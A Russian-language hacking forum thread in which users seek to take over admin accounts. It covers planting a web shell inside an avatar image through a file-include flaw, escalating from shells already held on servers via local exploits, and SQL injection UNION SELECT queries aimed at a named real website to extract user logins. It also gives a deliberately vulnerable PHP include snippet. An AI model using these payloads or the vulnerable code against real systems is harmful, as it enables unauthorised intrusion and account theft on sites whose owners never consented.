В общем нужно сламать или получить акк админа.Я отсканировал иксспайдеров и вот мне тут написало: Возможно ли получить куки админа?
1. Расскажите пожалуйста реально ли сейчас залить шелл через аватарку? Работает ли способ внедрения своего кода в картинку? 2. Есть 2 шелла на 2 серваках, выход на другие сайты закрыт. Тобишь папки других юзеров посмотреть не могу. Есть ли способы как то проникнуть в другие папки?
1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess) 2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)
Спасибо. А по поводу аватарки. Я попробовал на локалке и что то не прокатило у меня. Правильно ли я делаю? Открыл в WinHex картинку, и дописал вконце ради теста <script>alert('test')</script>. Пробовал еще вводить <?phpinfo()?>. Но когда открыл в браузере никакого результата. Подскажите пожалуйста где ошибка.
R1dex, ух спс. Просто я дошел до 4 полей и не стал дальше расскручивать, потому что ошибки никакой не было... Удали пост, не хочу чтобы индексовался сайт...
Да я и так и так пробовал, я даже пробовал <?php echo "Test" ?> выводить, не получается в картинку закинуть. Правильно делаю что в конец файла ввожу код? Кто нибудь знает что на сервере должно быть чтобы это ошибка работала? Какие то опции, права может.
Вот это как-бэ настораживает. Что значит "открыл в браузере" ? Это будет работать не при прямом обращении к файлу, а при инклуде. Надеюсь ты так и делаешь?
Нет)) я просто тестово на локалке прописал картинку, открываю ее путь и нифига, картинка цела и невредима Если не трудно, поподробнее объясните как оно проворачивается?
Мде Если просто для теста, создай файл например такой include.php PHP: <? $a=$_GET['a']; include "$a"; ?> И обращайся к нему http://localhost/test/include/include.php?a=твоя/картинка/1.bmp А картинку (1.bmp) уже редактируй
Привет. Я опять же с этим сайтом. Здесь нашел что в табле юзерс есть поле логин. Code: http://psp-club.ru/files/get/-114+union+select+COLUMN_NAME,2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USERS'+limit+10,1--/ Но когда пытаюсь вывести Code: http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+users+limit+1,1/ Ничего не выводит. Жду помощи, и конечно спасибо выражу +5.
